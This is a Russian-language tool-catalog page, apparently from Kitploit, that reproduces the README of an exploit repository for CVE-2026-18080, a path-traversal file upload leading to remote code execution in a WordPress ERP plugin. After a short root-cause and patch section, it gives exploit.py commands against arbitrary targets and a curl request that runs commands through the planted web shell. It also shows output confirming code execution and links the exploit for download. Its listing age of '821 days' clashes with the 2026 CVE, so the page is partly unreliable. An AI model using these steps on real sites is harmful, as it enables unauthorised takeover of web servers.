Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

Эксплойт для CVE-2026-18080 — неаутентифицированная произвольная загрузка файлов, приводящая к удалённому выполнению кода (RCE) в ERP Complete HR, Accounting & CRM Suite. Включает скрипты на Python и PHP для автоматизированной эксплуатации.

Репозиторий
821 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

Неаутентифицированная произвольная загрузка файлов через IMAP-вложение CRM Email Connect (Path Traversal → RCE)

ПолеЗначение
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
Патчhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (Критический)
CWECWE-434 (Неограниченная загрузка файлов опасного типа)
ЗатронутоВерсии плагина ERP <= 1.17.7 (исправлено в 1.17.8)

Описание

Функция save_attachments() плагина ERP в GmailSync.php обрабатывает входящие вложения электронной почты из IMAP без нормализации пути. Злоумышленник может создать письмо с именем файла вида ../../plugins/shell.php и подделанным заголовком References, соответствующим ожидаемому шаблону плагина. Фоновая задача синхронизации IMAP по cron записывает файл за пределы защищённой .htaccess директории crm-attachments/ в любой доступный для записи путь внутри wp-content/.

Первопричина

В GmailSync.php (v1.17.7):

root@kitploit:~
$name = $item['name'];              // Нет basename() или нормализации пути
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

Имя файла ../../plugins/shell.php, объединённое с $dir (wp-content/uploads/crm-attachments/), преобразуется в wp-content/plugins/shell.php — директорию, где разрешено выполнение PHP.

Исправление (v1.17.8) добавляет sanitize_attachment_filename(), которая удаляет компоненты пути через basename(), отклоняет разделители пути и блокирует опасные расширения.

Эксплуатация

Метод 1: Прямой (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

Метод 2: Пользовательский путь и имя оболочки

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

Метод 3: Зонд phpinfo

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

После успешной загрузки:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

Доказательство концепции

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

Файлы

ФайлОписание
exploit.pyPython-скрипт эксплойта с использованием wp-cli
exploit.phpАвтономный PHP-эксплойт для wp eval-file
README.mdЭтот файл
Скачать инструмент